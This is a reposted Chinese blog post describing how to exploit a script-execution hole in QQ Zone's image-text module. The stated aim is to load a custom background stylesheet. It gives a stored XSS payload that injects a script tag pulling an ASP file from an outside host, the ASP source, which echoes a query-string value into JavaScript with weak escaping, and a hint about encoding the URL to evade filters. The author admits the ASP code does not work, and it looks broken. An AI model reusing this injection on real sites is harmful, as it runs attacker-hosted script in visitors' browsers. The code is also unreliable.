JavaScript关于qq空间漏洞利用的方法研究。

我先说下整个思想是这样的。。。
qq空间图文模块有执行js的漏洞->我们利用这个漏洞去加载一个利用的接口也就是一会儿要提到的一个小asp文件,->利用这个接口来连接我们服务器上自己的 css文件。。。
->从而达到 利用我们自己的css文件 来美化 我们qq空间的方法。。

 

下面说下步骤。

<p style="background:url(javascript:document.body.appendChild(function(u){if(window['t']=document.createElement('script')){window['t'].src=decodeURIComponent(u)}return window['t']}('http://www.hanzd.cn/q/qzbg.asp?www.hanzd.cn=1')))"></p>

 

将上面的代码贴在添加图文模块的 描述里。。这样 就能成功调用我们的 http://www.hanzd.cn/q/qzbg.asp 文件。由于qq空间限制,这个网址应该用加密来绕过限制的。但为了清除。我再这里用了明文。。

 

<%
response.contenttype="text/html;charset=gb2312"
dim name
name=request.querystring("www.hanzd.cn")
name=replace(name,"""","“")
%>
var id="<%=name%>";
eval(
 css = document.createElement('link');
 css.setAttribute('title','Default');
 css.setAttribute('href','http://www.hanzd.cn/'+id+'.css');
 css.setAttribute('ref','stylesheet');
 css.setAttribute('type','text/css');
 document.getElementsByTagName('head')[0].appendChild(css);
 );

上面就是http://www.hanzd.cn/q/qzbg.asp 的源码。。目的 就是要调用我们自己写的 .css文件。。

 

我的 css文件很简单。。

body{background:url("http://imgcache.qq.com/qzone/space_item/orig/4/46436_bg.jpg");}
#contentBody{background:url("http://imgcache.qq.com/qzone/space_item/orig/4/46436_top.jpg") center top no-repeat;}

 

就加了个背景。。

但估计是我写的 asp文件有问题。。

因为我用别人写的 就有效果。。

而我自己写的就没有效果。。

所以 我 也不知道我 到底哪里错了。。

如果有谁知道 mmm我下。。。赐教下我 。。先谢谢了。。。qq253268499

转载于:https://www.cnblogs.com/521shina/archive/2009/10/21/1587506.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值